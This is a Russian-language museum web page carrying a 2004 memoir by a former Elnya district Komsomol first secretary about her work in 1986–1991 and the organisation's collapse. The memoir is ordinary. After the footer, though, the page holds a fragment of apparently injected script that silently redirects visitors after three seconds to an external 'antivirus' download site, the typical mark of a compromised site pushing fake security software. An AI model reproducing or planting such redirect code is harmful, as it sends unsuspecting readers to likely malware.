Так это было
 
 

 

Сборник "Так это было. Смоленский комсомол 1960-80 годов в воспоминаниях современников"


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
 

 

Раиса Даниловна Гребнева,
первый секретарь Ельнинского райкома
ВЛКСМ с 1989 по 1991 год.

Р.Д. Гребнева

 
 

 «Я НАУЧИЛАСЬ СЛУШАТЬ И СЛЫШАТЬ ЛЮДЕЙ...»

В июле 1986 года, отработав три года в Бибиревской средней школе Ельнинского района после окончания факультета иностранных языков Смоленского госпединститута, я оказалась перед выбором: продолжить педагогическую деятельность или же попробовать свои силы на другом поприще. Неожиданно раздавшийся звонок определил всю мою дальнейшую жизнь. Первый секретарь Ельнинского райкома комсомола Николай Митрофаненков попросил меня зайти к нему для разговора.
К тому времени отношения с райкомом у меня были довольно поверхностными. Сразу же, когда я пришла в школу, директор вручил мне план работы пионерской дружины и сказал, что помимо работы учителя немецкого языка я буду еще выполнять обязанности старшей пионервожатой. Возражения в расчет не принимались, и я стала вожатой. По итогам первого года работы дружина им. Ю. Гагарина Бибиревской школы стала правофланговой (одной из лучших), и на районном пионерском слете нам вручили переходящее знамя. Я была избрана членом бюро райкома комсомола и принимала участие в его работе.
Чуть позже Н. Митрофаненков предложил мне должность секретаря – зав. отделом учащейся молодежи. Он посоветовал мне все обдумать и объяснил, что после рассмотрения нескольких кандидатур выбор пал на меня. Спустя несколько дней я уже работала в райкоме комсомола. (Правда, пришлось съездить в обком ВЛКСМ на собеседование). В течение двух недель я изучала документы, а т.к. уже наступил август, то школы района активно включились в операцию «Лен-86». По ее итогам нас наградили грамотой обкома комсомола.
Последовавшие затем будни были насыщены различными делами: проводились слеты выпускников сельских школ, пионерские слеты, торжественные вручения комсомольских билетов, популярными были у нас факельные шествия, посвященные Дню Победы.
Спустя год мне позвонила Ирина Мирошниченко из обкома комсомола и предложила поехать на учебу в Высшую комсомольскую школу. Я отказалась, мотивируя отказ тем, что еще мало работаю и ничего существенного для района не сделала. Потом я очень сожалела о том, что не поехала. По рассказам тех, кто уже закончил школу, жизнь там была насыщена интересными событиями, была увлекательной и динамичной. Но судьба распорядилась так, что, уже будучи начальником отдела по делам молодежи, я в 1993–1995 гг. все-таки окончила это учебное заведение, которое к тому времени называлось институтом молодежи.
Наш первый секретарь, Николай Митрофаненков, в сентябре 1986 года улетел в Афганистан с миссией оказания помощи молодежи страны в создании организации, подобной нашему комсомолу. А спустя некоторое время пленум райкома избрал меня 2-м секретарем райкома ВЛКСМ. Первым секретарем в то время был С. Рябченков. На селе стал внедряться подряд. Активным проводником его стала член райкома комсомола Елена Шпакова. Продолжали работу стройотряды. Большую помощь в организации их работы оказывал нам ныне покойный Сергей Родненков из областного штаба ССО.
Однако уже к концу 80-х мы почувствовали, что в обществе назревают перемены. Все чаще стали звучать вопросы: а зачем нам комсомол? что он нам дает? Стало труднее собирать членские взносы, многие отказывались их платить, и приходилось вносить свои деньги.
Из разговоров с инструкторами райкома партии мы знали, что с подобными проблемами сталкиваются и они. Люди отказывались вступать в партию, многие, пройдя испытательный срок, говорили, что не видят смысла пребывания в ней.
В 1989 году у нас прошла очередная комсомольская конференция, на которой состоялись альтернативные выборы 1-го секретаря. Большинством голосов избрали меня. Альтернативные выборы как таковые уже были чем-то необычным. Когда пленум утвердил две кандидатуры и мы перед конференцией поехали в обком партии на собеседование, мне предложили снять свою кандидатуру. «Пусть останется одна кандидатура ныне действующего первого секретаря», – сказал чиновник. Но все вышло иначе.
После конференции стали остро ощущаться финансовые проблемы. В аппарате прошло сокращение. Чтобы найти финансы на зар­плату и проведение мероприятий, мы организовывали лотереи, аукционы, продавали популярные книги. Одним из самых ярких мероприятий конца 80-х стал районный конкурс «Мисс Очарование». В нем приняли участие 8 девушек, состязавшихся в танцевальной, песенной и других номинациях. Участниц встречали овациями. Присутствовавший на конкурсе первый секретарь Глинковского РК ВЛКСМ Игорь Кашлев заметил: «Вот это конкурс! Нам такого не провести». Все участницы получили прекрасные призы. Ведущие – поощрительные путевки в Югославию.
Шло время. После очередного отпуска, придя на работу в августе 1991 года, я увидела опечатанную дверь здания райкома партии. В то время в здании, кроме райкомов партии и комсомола, находилась еще и налоговая инспекция. Поэтому, опечатав центральный вход, для нас оставили так называемый «запасной»,  вход со двора. Поначалу работать в пустынном здании было непривычно. Вскоре к нам стали приходить гости: помещение собирались передать то поликлинике, то еще кому-то. Но медикам здание не подошло, и в конце концов в нем стала работать новая администрация района.
В октябре 1991 года состоялась I конференция ЛКСМ РСФСР. На ней пытались найти пути сохранения организации в новых условиях. Всесоюзный Ленинский Коммунистический Союз молодежи перестал существовать. Но и ЛКСМ РСФСР просуществовал недолго. На смену ему пришел РСМ (Российский Союз Молодежи), который у нас в районе не прижился. В феврале 1992 года тогдашний глава администрации района Т.В. Зацепин предложил мне возглавить отдел по делам молодежи, созданный при новой администрации. Так для меня закончился «комсомольский» этап биографии и начался новый.
Хотелось бы сказать о том, что как человеку работа в комсомоле дала мне, конечно же, многое. Прежде всего мне удалось преодолеть свою природную застенчивость, я научилась слушать и слышать людей, вникать в их проблемы, помогать в их решении. И это, несомненно, сыграло положительную роль в моей последующей работе.
Но самым главным было, естественно, знакомство со множеством прекрасных людей, которых я встретила за время работы в комсомоле. Слова благодарности хочу сказать в адрес А.И. Трудолюбова, С.А. Григоренко, Н.В. Казанцева, С.В. Бидного, Т.И. Ашихминой,
М.В. Соколовой, А.А. Боброва и многих других, с кем меня свела судьба. Со многими до сих пор сохранились хорошие отношения.
Возвращаясь сегодня в комсомольскую молодость, хочу сказать, что нами было сделано много полезных и интересных дел. И кризис в комсомоле явился лишь частью кризиса, охватившего всю систему, в т.ч. и нашего старшего товарища – партию. Гиперопека со стороны партийных органов в отношении комсомола сыграла негативную роль. Часто за звонкой фразой не видели человека, его бед и чаяний. Из партии исключали за то, что человек осмеливался высказать свое личное мнение, отличное от мнения партийных боссов. Проголосовав на бюро, партийцы потом между собой говорили о том, что исключенный был прав. Но вслух никто из них не осмеливался поддержать «несогласного».
Двойная мораль – одна для официальных кабинетов, другая – для «кухонных» разговоров – развращала людей, делая поражение системы неизбежным. Главное, что привело к краху, на мой взгляд, это неверие правящей верхушки в то, что она делала. Это неверие передалось людям... И сегодня мы имеем то, что имеем. Но, несмотря на все трудности, с которыми пришлось столкнуться за время работы в комсомоле, я считаю, что это время было наиболее яркой, насыщенной интересными событиями, запоминающейся страницей в моей биографии.

2004 г.

 

    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>